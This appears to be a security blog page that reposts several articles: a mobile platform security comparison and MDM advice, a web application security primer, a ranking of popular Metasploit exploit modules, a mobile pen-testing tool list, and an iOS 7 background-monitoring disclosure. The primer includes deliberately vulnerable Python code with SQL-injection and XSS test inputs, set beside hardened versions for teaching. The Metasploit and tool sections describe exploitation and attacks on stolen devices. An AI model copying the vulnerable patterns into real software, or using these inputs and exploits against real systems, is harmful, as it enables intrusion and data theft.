Encryption | AES 256, user has no disable option | AES 128, user has disable option, only some models support encryption | AES 256, user has disable option, not all devices support encryption | AES 256, user has disable option | AES 256, user has no disable option
FIPS 140-2 certification | Yes (Level 1) | No | Some models (Level 1) | Yes (Level 2) | Yes (Level 1)
Over-the-air data encryption | Yes | Yes | Yes | Yes | Yes
S/MIME | Yes | No | No | Yes | No**
VPN | Yes | Yes | Yes | Yes | No**
Configure VPN | Yes | Yes | Yes | Yes | No**
Restrict/block app stores | Yes | No | Yes | Yes | Yes
Restrict/block wireless LANs | Yes | No | Yes | Yes | No**
Configure allowable access points | Yes | Yes | Yes | Yes | No**
Signed apps required | Yes | No | No | Yes | Yes
Selective wipe of business apps and data only | Yes | No | Yes | Yes | No**
Remotely update business apps | Yes | No | Yes | Yes | Yes
Secure boot | Yes | Yes* | Yes | Yes | Yes
App sandboxing | Yes | Yes | Yes | Yes | Yes
Disable copy and paste | Yes | Yes | Yes | Yes | No**
Disable iCloud/Microsoft Account/Google Account sync and storage | Yes | No | Yes | Yes | No**


How to think about mobile device management
Ojas Rege, vice president of strategy at MDM vendor MobileIron, describes three bands of management requirements that IT should be thinking about.

The first set of requirements is around configuration and protection of lost or compromised devices. That typically requires password enforcement, encryption enforcement, remote lock and wipe, remote email configuration, certificates for identity, remote connectivity configuration (such as for Wi-Fi and VPNs, though he says this configuration capability is not essential if usage is just for email and over cellular networks), and detection of compromised OSes (such as jailbroken, rooted, or malware-infected ones).

The second set of requirements is around data loss prevention (DLP), which covers privacy controls (such as for user location), cloud-usage controls (such as for iCloud, SkyDrive, and Google Docs), and email DLP controls (such as the ability to restrict email forwarding and to protect attachments). “More regulated environments may require No. 2, and these policies are still TBD for Windows Phone,” Rege notes. By contrast, iOS, BlackBerry, and Android have supported most of these needs since (respectively) iOS 4, BES 5, and Android 3, though a few — such as managing email forwards — are handled outside the OS by MDM clients such as MobileIron’s.

The third set of requirements is around apps, such as their provisioning and data security. Although both Apple and Microsoft have mechanisms to do at least basic app management — iOS can essentially hide an app so that it’s no longer available to a user, and Windows Phone 8 can update corporate apps remotely — mobile application management (MAM) capabilities are mostly up to the mobile management vendors to deploy, Rege says.

All the app stores but Google’s are highly curated. For their mobile OSes, Microsoft and BlackBerry copied Apple’s curated approach, which has kept malware off iOS. Android has no such rigorous control, and although Google now spends more effort to analyze apps, the Google Play market is full of malware. The feds recently announced that industrial-class spyware used in advanced persistent threats has now entered the Google Play market.

All four platforms provide mechanisms for businesses to deploy their own apps directly to users, so they can deploy and manage corporate apps separately from those that users get from the app store. Mobile management tools can connect these mechanisms to group policies and content-management controls.

It’s a no-brainer that iOS and BlackBerry 10 have what it takes for almost any business’s security needs. Android, especially if you get Samsung or Motorola devices, is a plausible platform if you’re not worried about the malware potential. Meanwhile, Windows Phone holds down the rear, appropriate for low-security requirements.


Posted by CEOinIRVINE

Web Application Security

Hacking 2014. 8. 6. 04:07

Posted in Technopedia, Application Security

Web application security is a branch of Information Security that deals specifically with security of websites and web applications.

At a high level, Web application security draws on the principles of Application Security but applies them specifically to Internet and Web systems. Typically web applications are developed using programming languages such as PHP, J2EE, Java, ASP.NET, C#, VB.NET or Classic ASP.

Security Threats

With the emergence of Web 2.0, increased information sharing through Social Networking and increasing business adoption of the Web as a means of doing business and delivering service, websites are often attacked directly. Hackers either seek to compromise the corporate network or the end-users accessing the website by subjecting them to Drive-by downloading.

As a result, industry is paying increased attention to the security of the web applications themselves in addition to the security of the underlying computer network and operating systems.

The majority of web application attacks occur through Cross Site Scripting and SQL Injection attacks which typically result from flawed coding, and failure to sanitize input to and output from the web application. These are ranked in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors.
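To make the "flawed coding" point concrete, here is an added example (not code from the original article) that puts a vulnerable lookup and a vulnerable renderer next to their hardened forms. The database table, its two rows and the test inputs are constructed for this illustration; the fix for SQL injection is a parameterized query, and the fix for cross-site scripting is escaping output before it is placed in HTML.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory user table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, display_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "Alice"), ("bob", "<b>Bob</b>")],  # sample rows, constructed
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """SQL injection: the value is spliced into the SQL text, so quote
    characters in it change the query's grammar instead of staying data."""
    query = "SELECT display_name FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    """Hardened form: a bound parameter is sent separately from the SQL text,
    so the same input is compared as a literal string and matches nothing."""
    rows = conn.execute(
        "SELECT display_name FROM users WHERE username = ?", (username,)
    )
    return [row[0] for row in rows]


def render_vulnerable(name):
    """XSS: untrusted text is placed straight into markup."""
    return "<p>Welcome, " + name + "</p>"


def render_safe(name):
    """Hardened form: HTML-escape untrusted text before it reaches the page.
    html.escape turns <, >, &, and quotes into entities."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"  # classic test input that widens the WHERE clause
    print("concatenated query:", lookup_vulnerable(db, tautology))  # every row
    print("parameterized query:", lookup_safe(db, tautology))       # []
    markup = "<script>alert(1)</script>"
    print(render_vulnerable(markup))
    print(render_safe(markup))
```

The two pairs share one lesson: keep untrusted input out of the grammar of whatever you are generating (SQL, HTML) by using the interface the target language provides for data (bound parameters, entity escaping) rather than filtering characters by hand.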

Web Application Security Standards

OWASP is the emerging standards body for Web application security. In particular they have published the OWASP Top 10 which describes in detail the major threats against web applications. The Web Application Security Consortium (WASC) has created the Web Hacking Incident Database and also produced open source best practice documents on Web application security.

Web Application Security Technology

While security is fundamentally based on people and processes, there are a number of technical solutions to consider when designing, building and testing secure web applications. At a high level, these solutions include:
  • Black Box testing tools such as web application scanners, vulnerability scanners and penetration testing software
  • White Box testing tools such as static source code analyzers
  • Fuzzing Tools used for input testing
  • Web Application Firewalls(WAF) used to provide firewall-type protection at the web application layer
  • Password cracking tools for testing password strength and implementation

The web-based application security assessment process

The process of assessing the security of a web-based application, although not technically complex, often relies upon a multi-faceted approach utilising a variety of technologies and techniques. Unfortunately, there is currently no quick shrink-wrapped solution available to automatically and comprehensively assess an application's security. Various vendors can supply testing products that will search for the most basic faults in non-complex applications/environments and provide advice on better coding practices. Based upon experience in assessing critical Web-enabled applications, automated tools should only be used for first-round security testing and preliminary identification of potential flaws.

Depending on your specific requirements and the type of web-based application, an application security assessment should typically consist of the following phases:
  • Examination of external/client-side visible code for information that could be used for social engineering purposes or for information on how an application functions that might be used for a more focused attack.
  • Discovery of information on the type of environment that exists at the server side (e.g., embedded SQL queries specific to a single database version).
  • Inspection of application validation and bounds checking both for accidental and mischievous input. The purpose of this exercise is to ascertain the limits of correct server responses when handling unexpected data formats or sizes. This phase involves buffer overflow attempts to establish system resilience and performance continuity.
  • Manipulation of client-side code and locally stored information such as cookies and session information. Client-side code is altered to subvert authentication checking and used to establish the bounds of server reliance on client data fields. URL request information and GET/PUT requests are altered to achieve unexpected system responses and access confidential information.
  • Examination of application-to-application interaction between system components such as the Web service and back-end data sources. Attempts are made to reference system components by impersonating other system functions or sources. Redirection methods and messaging functions are closely examined.
  • Discovery of techniques that could be employed by attackers to escalate their permissions by referencing application components with higher server-side permissions, or exploitation of race conditions to identify lax permission or authentication checking.
  • Attempts to subvert in-transit data between the client and server system. Examination of data delivery methods and the likelihood of their subversion or use in a replay-type attack, or other session-oriented attacks, including an analysis of system responses to such data.
  • Authentication methods in use are examined for their robustness and resilience to various subversion techniques. Attempts are made to bypass authentication processes and/or impersonate valid logged-in users. Detailed studies of user segregation methods are undertaken and an analysis of server-side responses to failed attempts is made.
  • Overall examination of the application's deployment and security configuration from perceived threat models. Advice is given on secure deployment methodologies for the application type, based upon market considerations, new vulnerability developments and attack methodologies.


Posted by CEOinIRVINE

At Rapid7, we often get asked what the top 10 Metasploit modules are. This is a hard question to answer: What does "top" mean anyway? Is it a personal opinion, or what is being used in the industry? Because many Metasploit users work in highly sensitive environments, and because we respect our users' privacy, the product doesn't report any usage reports back to us.

We may have found a way to answer your questions: We looked at our metasploit.com web server stats, specifically the Metasploit Auxiliary and Exploit Database, to see which exploit and module pages were researched the most. Here they are, annotated with Tod Beardsley's excellent comments:


  1. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines -- this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2.

  5. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module.

  7. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular.

  8. Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507): This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that Just Works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed.

  9. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #9, I’d bet it’s the most-used module in classroom and test environments.

  10. Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039): This exploits the Plug and Play service on Windows 2000. This is the exploit that MS06-040 replaced, though until MS06-040, this was the most reliable exploit around for Windows 2000. The Zotob worm used it. Note that while the exploit isn’t 100% reliable, failed attempts had a tendency to trigger a reboot of the target, so the next attempt would be 100% successful. In other words, for some people, the reboot-on-failure is really more of a feature than a bug.


Let us know if you find this ranking interesting so we can continue sharing it in the future. We're excited to see how this list will look next month, and what the major changes will be!


If you want to use any of these exploits right now, you can download Metasploit for free!


Posted by CEOinIRVINE

Must-Have Tools: Software

  • Android Emulator and SDK Tools — The Android Emulator is almost as good as having real Android hardware since it can be used to run and assess Android applications. Pen testers can install the Android Emulator and the associated SDK tools for use in evaluating Android applications, and for attacking "stolen" Android devices. By Google http://developer.android.com/sdk
  • Plist Editor for Windows — The Plist Editor for Windows makes it easy to view and search binary or ASCII preference list files from compromised Apple iOS devices. Pen testers can use the Plist Editor for Windows to extract data from iOS built-in or third-party applications and harvest credentials or other sensitive data from numerous weak applications. By VOWSoft, Ltd. http://www.icopybot.com/plist-editor.htm
  • SQLiteSpy — SQLiteSpy reads, searches, and converts SQLite database files used on iOS and Android devices. Pen Testers can inspect the compromised contact, GPS history, browser history, SMS messages and more with SQLiteSpy. By Ralf Junker http://www.yunqa.de/delphi/doku.php/products/sqlitespy/index
  • Elcomsoft Phone Password Breaker* — EPPB is used to brute-force passwords on Apple iTunes backups and BlackBerry backups, and to bypass BlackBerry lock screen passcodes. Pen testers can use EPPB to decrypt and extract Apple and BlackBerry backup data from compromised hosts, and to bypass the passcode selection on BlackBerry devices. By Elcomsoft http://www.elcomsoft.com/eppb.html
  • iPhone Data Protection Tools — The iDPT suite creates an alternate iOS boot environment, allowing pen testers to brute-force PIN-based passcodes on older iPhone, iPod Touch and iPad devices. By Jonathan Zdziarski and a community of contributing developers http://code.google.com/p/iphone-dataprotection
  • Redsn0w — Redsn0w is an all-purpose iOS jailbreaking tool for iOS 5 devices. If device theft is in the scope of the mobile device pen test, the pen tester can jailbreak and access confidential data on stolen devices using Redsn0w. By iPhone Dev Team http://www.redsn0w.us
  • Satori — Satori is a multi-faceted passive operating system fingerprinting tool, combining results from over 25 different protocols for precise results. Pen testers can use Satori to monitor LAN or WLAN traffic and identify the mobile devices that are present to target. By Eric Kollmann http://chatteronthewire.org
  • Burp Suite* — Burp Suite is commonly used for web application assessments, but it also makes a powerful HTTP/S network manipulation tool when combined with a man-in-the-middle attack. Pen testers can use Burp Suite to exploit HTTP-based mobile applications with server-side and client-side injection attacks. By PortSwigger, Ltd. http://portswigger.net/burp
  • Ettercap — Ettercap is a powerful man-in-the-middle tool, adding powerful network traffic manipulation and plugin functionality to exploit downstream devices. Pen testers can use Ettercap to capture plaintext passwords, intercept SSL traffic, and manipulate DNS name resolution on mobile devices. By Alberto Ornaghi, Marco Valleri, Emilio Escobar, and Eric Milam http://ettercap.github.com/ettercap
  • Mercury Framework — The Mercury Framework is an Android security testing platform using a client/server architecture with plugin support for dynamic exploit delivery. Pen testers can use Mercury to evaluate the threat of malware on an Android platform, developing or leveraging available exploits to take advantage of Android platform vulnerabilities. By Daniel Bradberry https://github.com/mwrlabs/mercury
  • iPhone Configuration Utility — The iPCU tool from Apple provides a set of iOS device management features for small organizations, creating XML profiles that can be installed on iOS devices to specify wireless networks, platform settings, certificate trust, and more. Pen testers can use iPCU to create malicious profiles, adding the attacker as a new trusted root CA as part of a phishing assessment. By Apple Corporation http://www.apple.com/support/iphone/enterprise

Must-Have Tools: Hardware

  • Google Nexus* — The Google Nexus is the perfect hardware for experimenting with Android attacks with WiFi, Bluetooth, and NFC wireless capabilities. As a "Google Experience" device, the Nexus also receives software updates to stay current with new Android OS features. By Google http://www.google.com/nexus
  • iPad Mini* — A lower-cost alternative to an iPad or an unsubsidized iPhone, the iPad Mini runs all iOS applications. After jailbreaking the iPad Mini, pen testers can install and target vulnerable applications, or test the impact of attacks before delivering them to the production target environment. By Apple Corporation http://www.apple.com/ipad-mini


Posted by CEOinIRVINE

Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation

Background monitoring of mobile applications has become a hot topic on mobile devices. Existing reports show that such monitoring can be conducted on jailbroken iOS devices. FireEye mobile security researchers have discovered such a vulnerability, and found approaches to bypass Apple's app review process effectively and exploit non-jailbroken iOS 7 successfully. We have been collaborating with Apple on this issue.

Fig.1 Background Monitoring

We have created a proof-of-concept "monitoring" app on non-jailbroken iOS 7.0.x devices. This "monitoring" app can record all the user touch/press events in the background, including touches on the screen, home button presses, volume button presses and TouchID presses, and then this app can send all user events to any remote server, as shown in Fig.1. Potential attackers can use such information to reconstruct every character the victim inputs.

Note that the demo exploits the latest 7.0.4 version of iOS system on a non-jailbroken iPhone 5s device successfully. We have verified that the same vulnerability also exists in iOS versions 7.0.5, 7.0.6 and 6.1.x. Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring.

Fig.2 Background App Refresh Settings

Fig.3 Killing An App on iOS7

iOS7 provides settings for "background app refresh". Disabling background refresh for unnecessary apps helps prevent potential background monitoring. However, it can be bypassed. For example, an app can play music in the background without turning on its "background app refresh" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring.

Before Apple fixes this issue, the only way for iOS users to avoid this security risk is to use the iOS task manager to stop apps from running in the background. iOS7 users can press the Home button twice to enter the task manager and see preview screens of the apps that are open, and then swipe an app up and out of the preview to stop unnecessary or suspicious applications running in the background, as shown in Fig.3.

We conducted this research independently before we were aware of this recent report. We hope this blog could help users understand and mitigate this threat further.

Acknowledgement: Special thanks to Jari Salomaa for his valuable comments and feedback. We also thank Raymond Wei, Dawn Song and Zheng Bu for their valuable help on writing this blog.

Posted by CEOinIRVINE